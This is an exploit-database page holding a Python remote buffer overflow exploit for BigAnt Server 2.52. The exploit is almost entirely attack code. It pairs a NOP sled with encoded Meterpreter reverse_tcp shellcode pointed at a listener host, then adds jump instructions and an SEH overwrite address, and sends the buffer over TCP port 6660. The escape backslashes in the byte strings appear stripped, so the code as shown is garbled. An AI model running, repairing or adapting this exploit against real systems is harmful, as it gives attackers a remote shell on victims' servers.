BigAnt Server v2.52 Remote Buffer Overflow Exploit 2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BigAnt Server v2.52 Remote Buffer Overflow Exploit 2
# Published : 2010-01-03
# Author : DouBle_Zer0
# Previous Title : Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Next Title : NetTransport Download Manager version:2.90.510 0day

#!/usr/bin/python

#BigAnt Server 2.52 remote buffer overflow exploit 2
#Author: DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy..

import sys,socket

host = sys.argv[1]
buffer= "x90" * 20

#./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R | ./msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= ("x89xe1xd9xcexd9x71xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4cx49x47x70x43x30x47x70x45x30x4fx79"
"x4ax45x50x31x49x42x45x34x4ex6bx42x72x50x30x4e"
"x6bx50x52x44x4cx4cx4bx51x42x47x64x4ex6bx51x62"
"x44x68x46x6fx4dx67x50x4ax51x36x45x61x4bx4fx44"
"x71x49x50x4cx6cx45x6cx50x61x43x4cx44x42x46x4c"
"x51x30x4ax61x4ax6fx44x4dx46x61x4ax67x4bx52x4a"
"x50x42x72x50x57x4cx4bx42x72x44x50x4ex6bx42x62"
"x45x6cx47x71x48x50x4cx4bx51x50x42x58x4bx35x49"
"x50x50x74x50x4ax47x71x48x50x50x50x4cx4bx43x78"
"x46x78x4ex6bx51x48x47x50x43x31x49x43x49x73x47"
"x4cx51x59x4cx4bx45x64x4cx4bx43x31x4bx66x44x71"
"x49x6fx50x31x4fx30x4ex4cx49x51x48x4fx46x6dx43"
"x31x4ax67x44x78x49x70x51x65x4ax54x45x53x51x6d"
"x4ax58x45x6bx43x4dx51x34x43x45x48x62x43x68x4e"
"x6bx46x38x51x34x43x31x4bx63x45x36x4ex6bx44x4c"
"x50x4bx4cx4bx43x68x47x6cx46x61x4ex33x4cx4bx44"
"x44x4cx4bx47x71x4ax70x4cx49x43x74x51x34x51x34"
"x43x6bx51x4bx50x61x42x79x51x4ax46x31x4bx4fx49"
"x70x46x38x43x6fx51x4ax4ex6bx42x32x48x6bx4dx56"
"x43x6dx50x68x46x53x46x52x45x50x43x30x43x58x43"
"x47x50x73x50x32x43x6fx42x74x45x38x50x4cx43x47"
"x46x46x47x77x49x6fx4bx65x4cx78x4ex70x45x51x47"
"x70x47x70x45x79x48x44x43x64x42x70x42x48x44x69"
"x4bx30x42x4bx47x70x4bx4fx48x55x50x50x46x30x46"
"x30x46x30x43x70x50x50x47x30x46x30x43x58x4ax4a"
"x44x4fx49x4fx49x70x4bx4fx4bx65x4ax37x50x6ax44"
"x45x43x58x4fx30x4ex48x47x71x44x43x45x38x45x52"
"x43x30x44x51x43x6cx4ex69x49x76x50x6ax42x30x50"
"x56x46x37x50x68x4ax39x4dx75x44x34x50x61x4bx4f"
"x4bx65x4fx75x4bx70x42x54x44x4cx4bx4fx42x6ex47"
"x78x44x35x4ax4cx43x58x4ax50x48x35x4dx72x43x66"
"x4bx4fx4ax75x50x6ax47x70x43x5ax45x54x46x36x43"
"x67x42x48x44x42x49x49x4fx38x51x4fx4bx4fx4bx65"
"x4ex6bx47x46x50x6ax51x50x42x48x45x50x42x30x43"
"x30x45x50x50x56x42x4ax45x50x42x48x51x48x4cx64"
"x46x33x4ax45x49x6fx4ex35x4ax33x43x63x42x4ax45"
"x50x46x36x43x63x50x57x50x68x44x42x48x59x4fx38"
"x43x6fx4bx4fx4ex35x43x31x48x43x51x39x4fx36x4c"
"x45x49x66x43x45x48x6cx4bx73x44x4ax41x41")
buffer+= "x90" * 294
buffer+= "xe9x4cxfcxffxff"  #near jmp -----> shellcode
buffer+= "xebxf9x90x90"      #short jmp ----> near jmp
buffer+= "x95x32x9ax0f"      #p/p/r(partial overwrite is not possible as far as i know) 
buffer+= "x41" * 1000           #play
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6660))
s.send("USV " + buffer + "rnrn")
s.close()